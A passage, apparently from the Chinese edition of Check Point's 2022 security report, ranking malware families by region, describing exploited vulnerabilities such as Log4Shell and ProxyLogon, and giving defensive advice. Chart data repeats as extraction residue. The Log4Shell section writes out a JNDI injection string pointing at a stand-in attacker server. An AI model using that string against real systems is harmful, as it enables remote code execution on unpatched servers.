Formbook AgentTesla LokiBot Raccoon Vidar Snake Keylogger 其他

Formbook AgentTesla LokiBot Vidar NanoCore Raccoon 其他

7%

18%

16%

11% 8%7%

33%

16%

13%

9%

9%

38%

8%7%

Formbook AgentTesla Raccoon LokiBot Vidar NanoCore 其他

Formbook Raccoon AgentTesla Vidar RedLine Stealer LokiBot 其他

39%

42%

7%

主要信息窃取恶意软件主要信息窃取恶意软件

第第 5 5 章章

47CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 47CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

信息窃取恶意软件全局分析 信息窃取程序领域仍然由几个隐蔽的恶意软件系列所主导。AgentTesla 是 2014 年首次发

现的著名商品信息窃取程序,与 2020 年相比地位显著下降,占比锐减 50%。LokiBot 是

出现于 2016 年的商品信息窃取程序,同样经历了类似的下滑。

位居榜首的 Formbook 也是一款商品信息窃取恶意软件,自 2016 年以来在地下论坛作为

服务出售。该恶意软件旨在通过键盘记录功能来收集信息。2021 年年中发现了新的 Formbook

变种。该变种在网络钓鱼活动中分发,利用 PowerPoint 文档作为电子邮件附件来传播恶

意软件。

另一项首次进入我们主要恶意软件统计数据的恶意软件即服务是 Raccoon。该信息窃取程

序已在暗网上销售了至少两年,为其联盟成员提供维护良好的平台,特点是快速修复错误

和自动更新有效负载,并会将恶意软件安装在受害者机器上。

Raccoon 最近的更新包括窃取加密货币、投放更多恶意软件以及通过 Google SEO 而非钓

鱼邮件进行传播。当前的活动试图通过提供破解软件许可来引诱受害者。

第第 5 5 章章

48CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 48CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

图 22:全球主要加密货币挖掘恶意软件

图 24:EMEA 主要加密货币挖掘恶意软件

全球全球

图 23:美洲主要加密货币挖掘恶意软件

图 25:APAC 主要加密货币挖掘恶意软件

美洲美洲

欧洲、中东和非洲欧洲、中东和非洲 (EMEA) (EMEA) 亚太地区亚太地区 (APAC) (APAC)

50%

12%

7%

41%

5%5%4%3%

43%

8%6%

XMRig LemonDuck RubyMiner DarkGate Kinsing 其他

XMRig LemonDuck WannaMine NRSMiner RubyMiner 其他

2%

6%

43%

15%

13%

8%

15%

4%

XMRig LemonDuck RubyMiner WannaMine NRSMiner 其他

XMRig RubyMiner LemonDuck DarkGate Kinsing 其他

27%

42%

6%

33%

2% 50%

12%

7%

41%

5%5%4%3%

43%

8%6%

XMRig LemonDuck RubyMiner DarkGate Kinsing 其他

XMRig LemonDuck WannaMine NRSMiner RubyMiner 其他

2%

6%

43%

15%

13%

8%

15%

4%

XMRig LemonDuck RubyMiner WannaMine NRSMiner 其他

XMRig RubyMiner LemonDuck DarkGate Kinsing 其他

27%

42%

6%

33%

2% 50%

12%

7%

41%

5%5%4%3%

43%

8%6%

XMRig LemonDuck RubyMiner DarkGate Kinsing 其他

XMRig LemonDuck WannaMine NRSMiner RubyMiner 其他

2%

6%

43%

15%

13%

8%

15%

4%

XMRig LemonDuck RubyMiner WannaMine NRSMiner 其他

XMRig RubyMiner LemonDuck DarkGate Kinsing 其他

27%

42%

6%

33%

2%

50%

12%

7%

41%

5%5%4%3%

43%

8%6%

XMRig LemonDuck RubyMiner DarkGate Kinsing 其他

XMRig LemonDuck WannaMine NRSMiner RubyMiner 其他

2%

6%

43%

15%

13%

8%

15%

4%

XMRig LemonDuck RubyMiner WannaMine NRSMiner 其他

XMRig RubyMiner LemonDuck DarkGate Kinsing 其他

27%

42%

6%

33%

2%

主要加密货币挖掘恶意软件主要加密货币挖掘恶意软件

第第 5 5 章章

49CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 49CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

加密货币挖掘软件全局分析 XMRig 本身是一款合法的 Monero 加密货币挖掘工具,但被威胁执行者用于恶意目的,不

仅继续在 Cryptominer 排行榜上占据首位,而且相比 2020 年热度上升 25% 以上。本年度

有两个恶意软件系列首次跻身加密货币挖掘软件榜单:LemonDuck(排名仅次于 XMRig)

和 CryptoBot。

与年中统计数据相比,LemonDuck 攻击率增加 50% 以上,这是一款自传播加密货币挖掘

僵尸网络,具有凭据窃取、检测规避和横向移动功能。LemonDuck 还可用作恶意软件下载

器,并且经常被发现投放 Ramnit 木马病毒。

CryptoBot 是一种高级加密货币挖掘软件,会在感染后收集受害者的钱包和账户信息。

CryptoBot 于 12 月在一项针对盗版 Windows 操作系统用户的活动中被发现。该活动利用

名为 KMSPico 的指定激活工具,诱骗 Windows 密钥管理服务 (KMS) 将盗版 Windows 副

本验证为合法版本。当用户下载该工具的受损版本时,CryptoBot 会利用后台进程进行静默

安装。与 LemonDuck 类似,CyptoBot 先前被发现利用“永恒之蓝”(EternalBlue) 漏洞作

为其感染链的一部分。

第第 5 5 章章

50CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 50CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

图 26:全球最流行的银行木马病毒

图 28:EMEA 最流行的银行木马病毒

全球全球

图 27:美洲最流行的银行木马病毒

图 29:APAC 最流行的银行木马病毒

美洲美洲

欧洲、中东和非洲欧洲、中东和非洲 (EMEA) (EMEA) 亚太地区亚太地区 (APAC) (APAC)

36%

11% 11%

9%

5%

26%

19%

13% 8%

7%

5%

30%

14%

12%

21%

TrickBot Qbot Dridex IcedID Ursnif Ramnit 其他

TrickBot Ramnit Dridex Ursnif Qbot IcedID 其他

7%

8%

31%

16% 11%

10%

7%

21%

8%

TrickBot Qbot Dridex Ursnif Ramnit IcedID 其他

TrickBot Dridex Qbot Ursnif IcedID Zloader 其他

21%

22%

4%

7% 36%

11% 11%

9%

5%

26%

19%

13% 8%

7%

5%

30%

14%

12%

21%

TrickBot Qbot Dridex IcedID Ursnif Ramnit 其他

TrickBot Ramnit Dridex Ursnif Qbot IcedID 其他

7%

8%

31%

16% 11%

10%

7%

21%

8%

TrickBot Qbot Dridex Ursnif Ramnit IcedID 其他

TrickBot Dridex Qbot Ursnif IcedID Zloader 其他

21%

22%

4%

7%

36%

11% 11%

9%

5%

26%

19%

13% 8%

7%

5%

30%

14%

12%

21%

TrickBot Qbot Dridex IcedID Ursnif Ramnit 其他

TrickBot Ramnit Dridex Ursnif Qbot IcedID 其他

7%

8%

31%

16% 11%

10%

7%

21%

8%

TrickBot Qbot Dridex Ursnif Ramnit IcedID 其他

TrickBot Dridex Qbot Ursnif IcedID Zloader 其他

21%

22%

4%

7%

36%

11% 11%

9%

5%

26%

19%

13% 8%

7%

5%

30%

14%

12%

21%

TrickBot Qbot Dridex IcedID Ursnif Ramnit 其他

TrickBot Ramnit Dridex Ursnif Qbot IcedID 其他

7%

8%

31%

16% 11%

10%

7%

21%

8%

TrickBot Qbot Dridex Ursnif Ramnit IcedID 其他

TrickBot Dridex Qbot Ursnif IcedID Zloader 其他

21%

22%

4%

7%

主要银行木马病毒主要银行木马病毒

第第 5 5 章章

51CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 51CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

银行木马病毒全局分析

过去几年中,银行恶意软件领域继续由一组隐蔽的自适应恶意软件系列所主导。TrickBot

从全球排名第二攀升至榜首,Dridex 则从第一滑落到第三,与 2020 年相比下降近 60%。

Qbot 是一款不断进化的银行恶意软件,最初用于收集银行凭据和按键信息。它具有蠕虫

功能,但也可用作僵尸网络,常被勒索软件活动用来将恶意软件投放至受感染设备。9 月,Qbot

在中断三个月后恢复运作,执行大规模垃圾邮件活动。此次活动利用该恶意软件作为僵尸

网络和信息窃取程序,并分发“SquirrelWaffle”恶意软件加载程序。其最近的活动依靠

Visual Basic 和 Excel 4.0 宏来进行。11 月,随着恶意软件植入程序开始安装 Conti 勒索软

件,攻击活动据观察已进入货币化阶段。

Dridex 是另一款当前同时具备信息窃取程序和僵尸网络功能的银行恶意软件,本年度占比

显著下降。而在 9 月,研究人员发现了新的 Dridex 变种,它具有扩展的信息收集功能,在

使用特制 Excel 文档的网络钓鱼活动中传播。此外,12 月,Dridex 成为最早在利用 Log4j

漏洞实施感染的活动中分发的恶意软件之一。

第第 5 5 章章

52CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 52CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

图 30:全球主要移动终端恶意软件

图 32:EMEA 主要移动终端恶意软件

全球全球

图 31:美洲主要移动终端恶意软件

图 33:APAC 主要移动终端恶意软件

美洲美洲

欧洲、中东和非洲欧洲、中东和非洲 (EMEA) (EMEA) 亚太地区亚太地区 (APAC) (APAC)

26%

11%10%

14%

39%

29%

17% 13%

7%

Hiddad xHelper AlienBot FluBot 其他

Hiddad xHelper AlienBot FluBot 其他

44%

18%

16%

20%

Hiddad xHelper AlienBot FluBot 其他

2%34%

xHelper Hiddad AlienBot FluBot 其他

30%

16% 11%

3%

40%26%

11%10%

14%

39%

29%

17% 13%

7%

Hiddad xHelper AlienBot FluBot 其他

Hiddad xHelper AlienBot FluBot 其他

44%

18%

16%

20%

Hiddad xHelper AlienBot FluBot 其他

2%34%

xHelper Hiddad AlienBot FluBot 其他

30%

16% 11%

3%

40%

26%

11%10%

14%

39%

29%

17% 13%

7%

Hiddad xHelper AlienBot FluBot 其他

Hiddad xHelper AlienBot FluBot 其他

44%

18%

16%

20%

Hiddad xHelper AlienBot FluBot 其他

2%34%

xHelper Hiddad AlienBot FluBot 其他

30%

16% 11%

3%

40%

26%

11%10%

14%

39%

29%

17% 13%

7%

Hiddad xHelper AlienBot FluBot 其他

Hiddad xHelper AlienBot FluBot 其他

44%

18%

16%

20%

Hiddad xHelper AlienBot FluBot 其他

2%34%

xHelper Hiddad AlienBot FluBot 其他

30%

16% 11%

3%

40%

主要移动终端恶意软件主要移动终端恶意软件

第第 5 5 章章

53CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 53CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

移动终端恶意软件全局分析 Hiddad 是一款用于显示广告的 Android 恶意软件,此前利用了 Covid-19 主题,在榜单中

占据头部,与 xHelper 不分伯仲,后者的恶意软件市场份额相比 2020 年下降了 25%。今

年另有两张新面孔首次上榜,这两个全新恶意软件系列分别是:AlienBot 和 FluBot。

AlienBot 是一款由威胁执行者作为恶意软件即服务分发的 Android 银行恶意软件。该恶

意软件使攻击者能够向合法的金融应用程序远程注入任意代码,从而访问受害者的金融账

户,并最终完全控制他们的设备。3 月,Check Point Research 发现了名为“Clast82”的

新植入程序,它通过 Google Play 商店分发,在受害者机器上安装 AlienBot。该植入程序

利用多种技术来绕开 Google Play Protect 检测,比如在评估期间投放非恶意有效负载,通

过评估后再将该有效负载更改为 AlienBot。

FluBot 是 2020 年底出现的另一款 Android 银行恶意软件,以欧洲用户为攻击目标,通过

从受感染设备发送的 SMS 消息进行传播。FluBot 活动往往不走寻常路,在 6 月和 11 月

针对芬兰用户的活动中利用了语音邮件主题,要求受害者通过移动运营商的链接来收听消

息。具有讽刺意味的是,针对新西兰用户的活动使用了虚假的安全更新消息,伪装成向受

害者发送的 FluBot 感染警告。

第第 5 5 章章

54CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 54CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

第第 6 6 章章

引人注目的引人注目的 全球性漏洞

06

2017 年发现的多个漏洞在 2021 年全年保持强势表现,让新发现的 漏洞略显失色

55CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 55CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

下方的主要漏洞列表以 Check Point 防护系统 (IPS) 侦测网络收集的数据为依据,并详细

介绍了 2021 年 Check Point 研究人员发现的一些最流行和令人关注的攻击技术及漏洞攻

击。

“LOG4SHELL”APACHE LOG4J - 远程代码执行 (CVE-2021-44228) Apache Log4j 是 Apache 软件基金会提供的基于 Java 的开源日志包,是 Apache 日志服

务的一部分。它是最受欢迎的 Java 日志库,全球数百万基于 Java 的应用程序使用它来记

录日常系统操作和错误消息等活动,并向系统管理员发送诊断信息。12 月 9 日,Apache

基金会发布了紧急 Log4j 版本,用于修补日志框架中的一处严重漏洞。该漏洞使威胁执行

者能够通过发送简单的字符串来入侵设备,例如在 HTTP 请求、用户代理或任何其它可能

由使用 Log4j 的服务器记录的输入中包含字符串“${jndi:ldap://attacker_server/path}”。

借由控制通过日志包记录的消息,便可从远程服务器执行任意代码。名为“Log4Shell”的

该漏洞对数百万使用 Log4j 的公司产生深远影响,在安全领域掀起风暴,包括 Cisco、

Twitter、Cloudflare、Tesla、Amazon 和 Apple 在内的公司均受到波及。该漏洞几乎立即

遭到大范围利用,比如由低技能攻击者用于分发加密货币挖掘软件,以及由国家赞助的

APT 团体用来获取企业网络访问权限。根据 Check Point Research 的数据,大约 48.3%

的企业在 2021 年受到 Log4Shell 漏洞攻击的影响。

第第 6 6 章章

56CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 56CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

“PROXYLOGON”MICROSOFT EXCHANGE 服务器 - 身份验证绕过 (CVE-2021-26855) ProxyLogon 是由 DEVCORE 研究人员为在 2020 年底首次发现并报告的身份验证绕过漏

洞 (CVE-2021-26855) 所起的名称。与其它漏洞(CVE-2021-26857、CVE-2021-26858、CVE-

2021-27065)结合时,该感染链可能导致在任何未打补丁的主流 Exchange 服务器上进行远程

代码执行。ProxyLogon 已由多个 APT 组织广泛利用。8 月,Earth Baku 使用 SQL 注入并利

用 ProxyLogon 作为入口向量,在印度-太平洋地区发起了攻击活动。9 月,FamousSparrow 网

络间谍组织在全球连锁酒店、政府、私营企业及其它不同行业利用了该漏洞以及 SparrowDoor

后门程序。另一个威胁组织 SquirrelWaffle 被发现使用 ProxyShell 和 ProxyLogon 入侵

Microsoft Exchange 服务器,以通过恶意电子邮件传播恶意软件。

ATLASSIAN CONFLUENCE - 远程代码执行 (CVE-2021-26084) Atlassian Confluence Server 或 Confluence Data Center 中的这一关键远程代码执行漏洞

于 2021 年 8 月公开,源于对象图导航语言。该漏洞可在未经身份验证的情况下被利用,

允许远程攻击者在受影响的系统中执行任意代码。针对受影响的企业以及若干概念验证漏

洞利用,Atlassian 发布了相应的补丁。威胁执行者随后扫描了漏洞,目的是安装加密货币

挖掘软件。9 月,z0Miner 加密货币劫持软件试图在易受攻击的机器上进行挖掘操作。10

月,观察到 Atom Silo 勒索软件操纵者利用未打补丁的计算机发动勒索软件攻击。

第第 6 6 章章

57CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 57CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

图 34:2021 年披露的漏洞利用攻击百分比。

2021

2020

2019

2018

2017

2016

2015

2014

2013

2012

2011

更早

0 5 10 15 20

2%

11%

5%

12%

17%

7%

8%

10%

6%

8%

3%

11%

2017 年发现的多个漏洞在 2021 年全年保持强势表现。这种表现主要来自一些热门漏洞,

比如已整合至 Mirai 僵尸网络的 Apache Struts2 远程代码执行漏洞 (CVE-2017-5638),或

者通常用于利用易受攻击的 WordPress 插件的 PHPUnit 远程代码执行漏洞 (CVE-2017-

9841)。

2020 年发现的漏洞同样表现突出,在 11% 的攻击中被利用。其中最重要的是 Draytek

Vigor 系列缓冲区溢出漏洞(CVE-2020-10826、CVE-2020-10827、CVE-2020-10828),

它们在对全球企业的影响中占到 41% 的比例。这些漏洞可被利用,使用精心编制的远程

HTTP 请求,在易受攻击的 Draytek 路由器上运行任意代码。

第第 6 6 章章

58CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 58CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

图 35:每月披露的漏洞利用攻击百分比。

JA N

21 FE

B 2 1

MA R 2

1

AP R 2

1

MA Y 2

1

JU N

21 JU

L 2 1

AU G 2

1 SE

P 2 1

OC T 2

1

NO V 2

1

DE C 2

1

100%

90%

80%

70%

60%

50%

40%

30%

20%

10%

0%

2021 2020 2019 2018 2017 2016 2015 2014 2013 2012 2011 更早

与往年相比,我们观察到 2021 年漏洞适应速度较慢。图表显示,从年中开始,黑客利用的

2021 年漏洞逐渐增多,相较之下 2017 年 CVE 的使用略有下降。

59CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

JONY FISCHBEIN Check Point Software 首席信息安全官

第第 7 7 章章

防御下一波网络疫情防御下一波网络疫情 - 实现更高安全性的策略

07

60CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 60CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

威胁防护 - 预先防御,规避攻击 安全从业人员面临的最大挑战之一是第五代攻击 - 其结合了多种类型的威胁、大规模攻击

和广泛的攻击面。真正的全面保护需要采取架构化的方法,在攻击发生之前即做好防御。

最终目标是在所有可能的向量层面击退所有攻击。相较于内部组件无法拧成一股绳的基础

设施,安全架构能够实现和促成统一的聚合性防护基础设施,从而提供更为全面快速的保

护。借助安全架构在攻击发生之前做好防御,也正是 Check Point Infinity 的核心优势所

在。

网络边界无处不在,攻击范围不断扩大,企业需要基于 实时威胁情报做好精准防御

当前大规模供应链攻击时有发生,恶意软件不断花样翻新,威胁情报和快速响应能力至关

重要。借助全面情报主动消除威胁,通过托管安全服务监控网络,以及凭借事件响应功能

快速应对并解决攻击,这些能力对于在 2022 年保持业务正常运行必不可少。恶意软件在

不断进化,使威胁情报成为几乎每家公司都不可忽视的必要工具。如果企业拥有财务、个

人、知识或国家资产,那么采用更为全面的安全保护方法,就是有效防御当下各种攻击的

唯一正确的策略。目前最富成效的主动式安全解决方案之一便是威胁情报。威胁情报必须

覆盖所有攻击面,包括云、移动终端、网络、终端及物联网,因为这些都是企业中常见的

攻击向量。威胁情报不仅仅是数据,更是实践,应当大力推行预防为先的方法,在攻击渗

透之前实施拦截,获得已知和未知威胁的最佳捕获率,并实现接近为零的误报率,尽可能

减少对用户的干扰。

第第 7 7 章章

61CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 61CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

防护需要面面俱到,因为所有环节都可能成为攻击目标

为确保实现安全防护的有效覆盖,企业应该寻找一种可完全覆盖所有攻击面及向量的解决

方案。在多态混合环境中,边界如今无处不在,理应得到全面的安全保护。

电子邮件、Web 浏览、服务器和存储只是起点,保护还应延伸到移动 App、云端和外部存

储,纳入所连接移动设备和终端设备的合规性,并覆盖不断增长的物联网设备资产。多云

和混合云环境中的工作负载、容器和无服务器应用程序也应一律列入检查清单。随着企业

向云计算和混合工作模式快速转型,拥有强大的漏洞攻击防护策略变得愈加重要。

利用完备的统一架构

如今通过有效整合来获得全部网络资产的全面可见性,对于防范日益复杂的攻击至关重要。如今通过有效整合来获得全部网络资产的全面可见性,对于防范日益复杂的攻击至关重要。

许多公司尝试使用来自多个供应商的单用途产品拼凑而成的安全壁垒,往往会以失败告

终,并且由于技术脱节而造成安全漏洞。这种方法还会产生巨大的开销,因为它依赖于使

用多个系统以及与多家供应商合作,而不是采用单一集成解决方案。为确保实现全面的安

全保障,企业应采用统一的多层级化方法来保护所有 IT 要素,即网络、终端、云端、移动

设备和物联网,所有这些元素共享相同的防御架构,并实时获得相同的威胁情报数据。

第第 7 7 章章

62CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 62CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

• • 指导员工识别潜在威胁:指导员工识别潜在威胁:用户教育一直是避免恶意软

件感染的关键因素。应当了解文件的来源、员工接收

文件的原因以及他们是否可以信任发件人,这些认知

在员工打开文件和电子邮件之前始终十分有用。勒索

软件活动中最常见的感染方式仍然是垃圾邮件和网络

钓鱼电子邮件。很多时候,用户意识能在攻击发生之前

防患于未然。花些时间开展用户培训,确保他们在发

现异常情况时立即向公司安全团队报告。

维持网络安全洁净度

• • 修补:修补:攻击者通常能够利用已知漏洞渗透安全防

御,针对此类漏洞虽然有已发布的补丁,但并未用

补丁进行修补。企业应尽量确保所有系统及软件的

安全补丁都是最新版本。

• • 分段:分段:应该对网络进行分段,并在各网段之间部署

强大的防火墙和 IPS 防护措施,从而防止感染蔓

延到整个网络。

感染率 病毒感染率 [Ro] [来源:WHO] 一名病毒携带者平均感染的人数: 流感:1.3,SARS:2-4,新冠病毒:2.5, 埃博拉病毒:1.6-2,寨卡病毒:2-6.6, 麻疹:11-18

感染防御 最佳治疗:疫苗接种 感染处理最佳实践: 1] 检疫、封控 2] 隔离 3] 接触者追踪

安全最佳实践 一般处理 [至接种疫苗]: 1] 口罩 2] 个人卫生 3] 社交距离

生物疫情

感染率 恶意软件感染率 [Ro] 一台带有恶意软件的主机平 均感染的主机数量: 网络攻击:>27 次(来源:WEF、NSTU) Slammer:每 8.5 秒大小翻倍 Code Red:每分钟 2,000 台新主机

感染防御 最佳治疗:实时防御 最佳实践:持续进行: 1] 检疫:沙盒、微分段 2] 隔离:零信任、分工 3) 追踪:威胁情报、AI、SOC、态势管理

安全最佳实践 1] 意识:点击之前请三思... 2] 网络卫生:补丁、合规性... 3] 资产距离:网络分段、多因素身份验证...

网络疫情

生物疫情与网络疫情生物疫情与网络疫情 相似点与并列项、可借鉴教训

第第 7 7 章章

63CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 63CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

法,比如机器学习、沙盒、异常检测、内容清除

等等,其中每种技术在特定场景中成效显著,涵

盖特定的文件类型或攻击向量。强大的解决方案

会纳入广泛的技术和创新,以有效应对 IT 环境中

的现代攻击。除了防病毒和 IPS 等基于签名的传

统保护,组织还需要增设防御层来防范没有已知

签名的陌生未知恶意软件。需要考虑的两个关键

组件是威胁剥离(文件清理)和威胁仿真(高级

沙盒),每种元素都提供独特的保护,结合使用

则构成全面的解决方案,在网络级别以及直接在

终端设备上针对未知恶意软件提供防护。

• • 审查:审查:必须仔细审查安全产品策略,并对事件日志

以及警报进行持续监控。

• • 审核:审核:应该对所有系统进行例行审核与渗透测试。

• • 最小特权原则:最小特权原则:应限定用户和软件所必需的最小特

权。每个用户都拥有其设备的管理员权限是否真有

必要?

• • 实施最先进的安全技术:实施最先进的安全技术:没有哪种技术能够提供

防范所有威胁、抵御所有威胁向量的万全之策。

不过,我们可以综合利用许多优秀的技术和想

第第 7 7 章章

64CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

结语

正如预测的那样,过去一年以史上最具破坏性的供应链攻击事件之一作为开端,这一年中

我们看到威胁执行者的信心和老练程度都有所提高,并且在年底的 Log4j 漏洞利用中达到

顶点,再次让安全领域措手不及,同时彻底凸显软件供应链的固有业务风险水平。在不同

月份,我们先后看到云服务受到攻击,威胁执行者越来越关注移动设备,Colonial Pipeline

被勒索赎金,以及历史上最危险的僵尸网络之一死灰复燃。

但一切并非全然悲观无望。我们还看到,随着世界各地的政府和执法机构决心对勒索软件

组织采取更强硬的立场,勒索软件生态系统在 2021 年露出更多破绽。一些令人震惊的事件

让各国政府意识到,他们需要采取更具前瞻性和主动性的方法来应对网络风险,而不是依

赖于被动反应和补救措施。同样的理念也延伸到企业当中,他们不愿再采取脱节、孤立、

保守的方法来应对威胁,而是需要获得 360 度全方位可见性和实时威胁情报,以及通过协

同增效的方式对安全基础设施加以调度。

65CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 65CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

附录附录

恶意软件系列说明

66CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

AgentTesla AgentTesla 是一种高级远程访问木马病毒 (RAT),用作键盘记录器和密码窃取程序,自 2014 年活跃至今。AgentTesla 可以监视并收集受害者的键盘输入和系统剪切板,记录截 屏并窃取安装在受害者机器上的各类软件的凭据,包括 Google Chrome、Mozilla Firefox 和 Microsoft Outlook 电子邮件客户端。AgentTesla 在各种网上市场和黑客论坛上出售。

AlienBot AlienBot 是一种针对 Android 系统的银行木马,以恶意软件即服务 (MaaS) 的形式通过地 下渠道出售。它支持键盘记录、凭据窃取动态覆盖以及通过 SMS 收集绕过 2FA。使用 TeamViewer 模块时还提供额外的远程控制功能。

Bazar Bazar 加载程序和 Bazar 后门程序发现于 2020 年,由 WizardSpider 网络犯罪团伙在感染 初始阶段使用。加载程序负责攻破后续阶段,后门程序则用于持久渗透。感染之后通常使

用 Conti 或 Ryuk 进行勒索软件全面部署。

CryptoBot CryptoBot 是一种高级加密货币挖掘软件,会在感染后收集受害者的钱包和账户信息。 2021 年 12 月,CryptoBot 在一项针对盗版 Windows 操作系统用户的活动中被发现。

Cl0p Cl0p 是最早于 2019 年初发现的一种勒索软件,主要针对大型企业。在 2020 年,Cl0p 操 纵者开始实施双重勒索策略,除了加密受害者的数据,攻击者还威胁称除非满足勒索赎金

要求,否则将公开窃取的信息。2021 年,Cl0p 勒索软件被用于多次攻击,其中的初始访 问权限是通过利用 Accellion 文件传输设备中的零日漏洞获得。

67CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

DanaBot DanaBot 是一种通过 Delphi 进行编程,并以 Windows 平台为攻击目标的模块化银行木马 病毒。该恶意软件于 2018 年首次被发现,通过恶意垃圾邮件进行传播。一旦设备被感染, 恶意软件就会从 C&C 服务器下载更新的配置代码和其它模块。提供的模块包括拦截凭据 的“嗅探器”、从流行应用程序那里窃取密码的“窃取程序”、用于远程控制的“VNC” 模块等。

DarkGate DarkGate 是一种自 2017 年 12 月开始活跃的多功能恶意软件,集勒索软件、凭据窃取、 RAT 和加密货币挖矿等功能于一身。DarkGate 主要以 Windows 操作系统为攻击目标,采 用多种不同的躲避技术。

Dridex Dridex 是一种以 Windows 平台为攻击目标、由银行木马程序转变而来的僵尸网络。它通过 垃圾邮件活动和漏洞工具包进行传播,凭借 Web 注入拦截银行凭据,并将其重定向到受攻 击者控制的服务器。Dridex 可联系远程服务器,发送被感染系统的信息,还可以下载和执 行其它用于远程控制的模块。

Emotet Emotet 是一种可以自我传播的高级模块化木马病毒。曾被用作银行木马病毒,现在则用于 分发其它恶意软件或恶意活动。它可以使用多种方法来维持持久性,并能采用躲避技术避开

检测。另外,Emotet 也可通过包含恶意附件或链接的钓鱼垃圾电子邮件进行传播。

FluBot FluBot 是一种通过钓鱼 SMS 消息 (SMiShing) 分发的 Android 恶意软件,通常冒充物流配 送品牌发送消息,一旦用户点击其中的链接,就会被重定向至包含 FluBot 的虚假应用程序 下载链接。安装之后,该恶意软件便能获取凭据并支持短信钓鱼操作,包括上传联系人列表

以及向其它电话号码发送 SMS 消息。

68CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

FlyTrap FlyTrap 是一种用于窃取 Facebook 凭据、位置、电子邮件地址、IP 等的 Android 木马程 序。该木马程序最初通过 Google Play 上的虚假 Android App 传播,诱导用户登录自己的 Facebook 帐户。在这一阶段,FlyTrap 利用 JavaScript 注入来劫持会话,并将其详细信息 发送到 C&C 服务器,从而允许攻击者从远程位置访问 Facebook 帐户。

FormBook FormBook 是一种针对 Windows 操作系统的信息窃取程序,首次发现于 2016 年。它以强 大的躲避技术与相对较低的价格为卖点,在地下黑客论坛上作为恶意软件即服务 (MaaS) 出售。FormBook 可通过各种 Web 浏览器窃取凭据、收集屏幕截图、进行监视并记录按键 输入内容,还可根据其 C&C 的指令下载并执行文件。

Glupteba Glupteba 是一种 Windows 后门程序,自 2011 年以来广为人知,其后逐渐发展成为僵尸网 络。到 2019 年,它新增了通过公共比特币列表进行 C&C 地址更新的机制、完备的浏览器 窃取程序功能以及路由器开发程序。

Hiddad 这是一款 Android 恶意软件,它会重新打包合法应用程序,然后将其发布到第三方商店。 主要功能是显示广告,但它也能获取操作系统内置的关键安全详细信息。

IcedID IcedID 是一种银行木马病毒,首次亮相于 2017 年 9 月。它通过垃圾邮件活动传播,并经 常利用 Emotet 等其它恶意软件来帮助其进行扩散。IcedID 使用了一些躲避技术,比如进 程注入和隐写术,并通过重定向攻击(安装本地代理,将用户重定向到虚假克隆网站)和 Web 注入攻击来窃取用户财务数据。

Kinsing Kinsing 发现于 2020 年,是一款带有隐匿程序组件的 Golang 加密货币挖掘软件。Kinsing 最初专门利用 Linux 系统,通过滥用面向互联网的服务漏洞安装在受攻击的服务器上。 2021 年后半年还开发出该恶意软件的 Windows 变种,使攻击者可以增加攻击面。

69CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

LemonDuck LemonDuck 是于 2018 年首次发现的针对 Windows 系统的加密货币挖掘软件。它具有高 级传播模块,包括发送垃圾邮件、RDP 暴力破解以及通过 BlueKeep 等已知漏洞进行大规 模恶意利用。随着时间的推移,还观察到该软件会收集电子邮件和凭据,以及传播 Ramnit 等其它恶意软件系列。

LokiBot LokiBot 是一种针对 Windows 的商品信息窃取木马。它可以从各种不同的应用程序、Web 浏览器、电子邮件客户端以及 IT 管理工具(如 PuTTY)等收集凭据。LokiBot 一直在黑客 论坛上售卖,据悉是因为其源代码遭泄露,才导致各类变种层出不穷。该信息窃取木马于 2016 年 2 月被首度披露。

Mirai Mirai 是一个声名狼藉的物联网 (IoT) 恶意软件,可以追踪易受攻击的 IoT 设备(例如网络 摄像头、调制解调器和路由器),并将其变成僵尸设备。僵尸网络操纵者利用该恶意软件

发起大规模分布式拒绝服务 (DDoS) 攻击。Mirai 僵尸网络首次发现于 2016 年 9 月,因其 庞大的攻击规模迅速成为了当时的焦点话题。Mirai 发动的攻击包括造成利比里亚整个国家 陷入停摆的一场大规模 DDoS 攻击,以及针对互联网基础设施公司 Dyn 的 DDoS 攻击, 美国绝大多数的互联网基础设施均由 Dyn 提供。

MyloBot Mylobot 是一种复杂的僵尸网络,于 2018 年 6 月首次出现,其装备了复杂的躲避技术, 包括反虚拟机、反沙盒和反调试技术。攻击者可以利用僵尸网络完全控制用户的系统,从

